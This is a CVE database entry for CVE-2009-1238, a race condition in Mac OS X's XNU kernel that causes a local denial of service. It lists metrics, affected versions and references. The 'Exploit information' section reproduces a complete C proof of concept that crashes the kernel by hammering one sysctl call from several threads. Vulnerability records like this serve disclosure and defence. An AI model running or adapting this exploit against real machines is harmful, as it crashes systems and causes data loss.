CVE-2009-1238 : Detail

CVE-2009-1238

0.11%V4
Local
2009-04-02
15h00 +00:00
2017-09-28
10h57 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Race condition in the HFS vfs sysctl interface in XNU 1228.8.20 and earlier on Apple Mac OS X 10.5.6 and earlier allows local users to cause a denial of service (kernel memory corruption) by simultaneously executing the same HFS_SET_PKG_EXTENSIONS code path in multiple threads, which is problematic because of lack of mutex locking for an unspecified global variable.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')
The product contains a concurrent code sequence that requires temporary, exclusive access to a shared resource, but a timing window exists in which the shared resource can be modified by another code sequence operating concurrently.

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.2 AV:L/AC:L/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 8265

Publication date : 2009-03-22 23h00 +00:00
Author : mu-b
EDB Verified : Yes

/* xnu-vfssysctl-dos.c * * Copyright (c) 2008 by <mu-b@digit-labs.org> * * Apple MACOS X xnu <= 1228.x local kernel DoS POC * by mu-b - Wed 19 Nov 2008 * * - Tested on: Apple MACOS X 10.5.5 (xnu-1228.8.20~1/RELEASE_I386) * * - Private Source Code -DO NOT DISTRIBUTE - * http://www.digit-labs.org/ -- Digit-Labs 2008!@$! */ #include <stdio.h> #include <stdlib.h> #include <hfs/hfs_mount.h> #include <pthread.h> #include <string.h> #include <sys/mount.h> #include <sys/types.h> #include <sys/sysctl.h> #include <unistd.h> void hammer (void *arg) { char buf[1024 * (255 + 1)]; int n, name[6]; memset (buf, 0, sizeof buf); while (1) { name[0] = CTL_VFS; name[1] = 17; name[2] = HFS_SET_PKG_EXTENSIONS; name[3] = (int) buf; name[4] = 1024; name[5] = (rand () % 254) + 1; n = sysctl (name, 6, NULL, NULL, NULL, 0); usleep(10); } } int main (int argc, char **argv) { int i, n, tid; printf ("Apple MACOS X xnu <= 1228.x local kernel DoS PoC\n" "by: <mu-b@digit-labs.org>\n" "http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n"); for (i = 0; i < 4; i++) { n = pthread_create (&tid, NULL, hammer, NULL); if (n < 0) { fprintf (stderr, "failed creating hammer thread\n"); return (EXIT_FAILURE); } } while (1) sleep (1); /* not reached! */ return (EXIT_SUCCESS); } // milw0rm.com [2009-03-23]

Products Mentioned

Configuraton 0

Apple>>Mac_os_x >> Version To (including) 10.5.6

Apple>>Mac_os_x >> Version 10.0

Apple>>Mac_os_x >> Version 10.0.0

Apple>>Mac_os_x >> Version 10.0.1

Apple>>Mac_os_x >> Version 10.0.2

Apple>>Mac_os_x >> Version 10.0.3

Apple>>Mac_os_x >> Version 10.0.4

Apple>>Mac_os_x >> Version 10.1

Apple>>Mac_os_x >> Version 10.1.0

Apple>>Mac_os_x >> Version 10.1.1

Apple>>Mac_os_x >> Version 10.1.2

Apple>>Mac_os_x >> Version 10.1.3

Apple>>Mac_os_x >> Version 10.1.4

Apple>>Mac_os_x >> Version 10.1.5

Apple>>Mac_os_x >> Version 10.2

Apple>>Mac_os_x >> Version 10.2.0

Apple>>Mac_os_x >> Version 10.2.1

Apple>>Mac_os_x >> Version 10.2.2

Apple>>Mac_os_x >> Version 10.2.3

Apple>>Mac_os_x >> Version 10.2.4

Apple>>Mac_os_x >> Version 10.2.5

Apple>>Mac_os_x >> Version 10.2.6

Apple>>Mac_os_x >> Version 10.2.7

Apple>>Mac_os_x >> Version 10.2.8

Apple>>Mac_os_x >> Version 10.3

Apple>>Mac_os_x >> Version 10.3.0

Apple>>Mac_os_x >> Version 10.3.1

Apple>>Mac_os_x >> Version 10.3.2

Apple>>Mac_os_x >> Version 10.3.3

Apple>>Mac_os_x >> Version 10.3.4

Apple>>Mac_os_x >> Version 10.3.5

Apple>>Mac_os_x >> Version 10.3.6

Apple>>Mac_os_x >> Version 10.3.7

Apple>>Mac_os_x >> Version 10.3.8

Apple>>Mac_os_x >> Version 10.3.9

Apple>>Mac_os_x >> Version 10.4

Apple>>Mac_os_x >> Version 10.4.0

Apple>>Mac_os_x >> Version 10.4.1

Apple>>Mac_os_x >> Version 10.4.2

Apple>>Mac_os_x >> Version 10.4.3

Apple>>Mac_os_x >> Version 10.4.4

Apple>>Mac_os_x >> Version 10.4.5

Apple>>Mac_os_x >> Version 10.4.6

Apple>>Mac_os_x >> Version 10.4.7

Apple>>Mac_os_x >> Version 10.4.8

Apple>>Mac_os_x >> Version 10.4.8

    Apple>>Mac_os_x >> Version 10.4.8

      Apple>>Mac_os_x >> Version 10.4.8

        Apple>>Mac_os_x >> Version 10.4.9

        Apple>>Mac_os_x >> Version 10.4.10

        Apple>>Mac_os_x >> Version 10.4.11

        Apple>>Mac_os_x >> Version 10.5

        Apple>>Mac_os_x >> Version 10.5.0

        Apple>>Mac_os_x >> Version 10.5.1

        Apple>>Mac_os_x >> Version 10.5.2

        Apple>>Mac_os_x >> Version 10.5.2

          Apple>>Mac_os_x >> Version 10.5.3

          Apple>>Mac_os_x >> Version 10.5.4

          Apple>>Mac_os_x >> Version 10.5.5

          Apple>>Mac_os_x_server >> Version To (including) 10.5.6

          Apple>>Mac_os_x_server >> Version 10.0

          Apple>>Mac_os_x_server >> Version 10.0.0

          Apple>>Mac_os_x_server >> Version 10.0.1

          Apple>>Mac_os_x_server >> Version 10.0.2

          Apple>>Mac_os_x_server >> Version 10.0.3

          Apple>>Mac_os_x_server >> Version 10.0.4

          Apple>>Mac_os_x_server >> Version 10.1

          Apple>>Mac_os_x_server >> Version 10.1.0

          Apple>>Mac_os_x_server >> Version 10.1.1

          Apple>>Mac_os_x_server >> Version 10.1.2

          Apple>>Mac_os_x_server >> Version 10.1.3

          Apple>>Mac_os_x_server >> Version 10.1.4

          Apple>>Mac_os_x_server >> Version 10.1.5

          Apple>>Mac_os_x_server >> Version 10.2

          Apple>>Mac_os_x_server >> Version 10.2.0

          Apple>>Mac_os_x_server >> Version 10.2.1

          Apple>>Mac_os_x_server >> Version 10.2.2

          Apple>>Mac_os_x_server >> Version 10.2.3

          Apple>>Mac_os_x_server >> Version 10.2.4

          Apple>>Mac_os_x_server >> Version 10.2.5

          Apple>>Mac_os_x_server >> Version 10.2.6

          Apple>>Mac_os_x_server >> Version 10.2.7

          Apple>>Mac_os_x_server >> Version 10.2.8

          Apple>>Mac_os_x_server >> Version 10.3

          Apple>>Mac_os_x_server >> Version 10.3.0

          Apple>>Mac_os_x_server >> Version 10.3.1

          Apple>>Mac_os_x_server >> Version 10.3.2

          Apple>>Mac_os_x_server >> Version 10.3.3

          Apple>>Mac_os_x_server >> Version 10.3.4

          Apple>>Mac_os_x_server >> Version 10.3.5

          Apple>>Mac_os_x_server >> Version 10.3.6

          Apple>>Mac_os_x_server >> Version 10.3.7

          Apple>>Mac_os_x_server >> Version 10.3.8

          Apple>>Mac_os_x_server >> Version 10.3.9

          Apple>>Mac_os_x_server >> Version 10.4

          Apple>>Mac_os_x_server >> Version 10.4.0

          Apple>>Mac_os_x_server >> Version 10.4.1

          Apple>>Mac_os_x_server >> Version 10.4.2

          Apple>>Mac_os_x_server >> Version 10.4.3

          Apple>>Mac_os_x_server >> Version 10.4.4

          Apple>>Mac_os_x_server >> Version 10.4.5

          Apple>>Mac_os_x_server >> Version 10.4.6

          Apple>>Mac_os_x_server >> Version 10.4.7

          Apple>>Mac_os_x_server >> Version 10.4.8

          Apple>>Mac_os_x_server >> Version 10.4.9

          Apple>>Mac_os_x_server >> Version 10.4.10

          Apple>>Mac_os_x_server >> Version 10.4.11

          Apple>>Mac_os_x_server >> Version 10.5

          Apple>>Mac_os_x_server >> Version 10.5.0

          Apple>>Mac_os_x_server >> Version 10.5.1

          Apple>>Mac_os_x_server >> Version 10.5.2

          Apple>>Mac_os_x_server >> Version 10.5.3

          Apple>>Mac_os_x_server >> Version 10.5.4

          Apple>>Mac_os_x_server >> Version 10.5.5

          References

          https://www.exploit-db.com/exploits/8265
          Tags : exploit, x_refsource_EXPLOIT-DB
          http://www.securityfocus.com/bid/34202
          Tags : vdb-entry, x_refsource_BID
          http://secunia.com/advisories/34424
          Tags : third-party-advisory, x_refsource_SECUNIA